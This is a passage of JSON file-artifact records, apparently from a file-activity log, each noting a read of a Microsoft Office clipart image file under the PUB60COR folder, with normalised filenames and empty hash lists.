"hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0400004.png", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0400005.PNG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0400005.png", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00042_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00042_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00433_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00433_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00462_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00462_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00523_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00523_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00525_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00525_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00530_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00530_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00538_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00538_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA00784_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na00784_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01064_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01064_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01066_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01066_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01293_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01293_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01356_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01356_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01357_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01357_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01368_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01368_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01421_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01421_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01468_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01468_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA01470_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na01470_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02125_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02125_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02126_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02126_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02405_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02405_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00013_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00013_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00014_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00014_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00049_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00049_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00050_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00050_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00052_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00052_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00468_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00468_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00485_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00485_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00489_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00489_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00542_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00542_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00563_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00563_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00633_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00633_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00640_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00640_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00668_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00668_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00726_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00726_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE00737_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe00737_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02262_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02262_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02263_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02263_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02265_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02265_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02267_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02267_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02270_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02270_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02278_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02278_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02280_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02280_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02282_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02282_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02285_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02285_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02287_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02287_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02288_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02288_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02293_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02293_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02296_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02296_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE03466_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe03466_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE05930_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe05930_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE06450_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe06450_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH00780U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph00780u.bmp", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01035U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01035u.bmp", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01046J.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01046j.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01179J.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01179j.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01235U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01235u.bmp", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01236U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01236u.bmp", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01247U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01247u.bmp", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01265U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01265u.bmp", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01332U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01332u.bmp", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01478U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01478u.bmp", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01562U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01562u.bmp", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01607U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01607u.bmp", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01931J.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01931j.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02028K.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02028k.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02039U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02039u.bmp", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02040U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02040u.bmp", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02053J.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02053j.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02058U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02058u.bmp", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02062U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02062u.bmp", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02069J.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02069j.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02071U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02071u.bmp", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02074U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02074u.bmp", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02208U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02208u.bmp", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02223U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02223u.bmp", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02291U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02291u.bmp", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02398U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02398u.bmp", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02417U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02417u.bmp", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02466U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02466u.bmp", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02470U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02470u.bmp", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02503U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02503u.bmp", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02567J.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02567j.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02736G.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02736g.gif", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02736U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02736u.bmp", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02738U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02738u.bmp", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02740G.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02740g.gif", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02740U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02740u.bmp", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02742G.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02742g.gif", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02742U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02742u.bmp", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02743G.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02743g.gif", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02746G.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02746g.gif", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02746U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02746u.bmp", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02748G.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02748g.gif", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02748U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02748u.bmp", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02749G.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02749g.gif", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02749U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02749u.bmp", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02750G.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02750g.gif", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02750U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02750u.bmp", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02752G.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02752g.gif", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02752U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02752u.bmp", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02753U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02753u.bmp", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02754U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02754u.bmp", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02755U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02755u.bmp", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02756U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02756u.bmp", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02757U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02757u.bmp", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02758U.BMP", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02758u.bmp", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02759J.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02759j.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02810J.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02810j.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02829J.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02829j.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03014_.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph03014_.gif", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03041I.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph03041i.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03143I.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph03143i.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03205I.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph03205i.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft 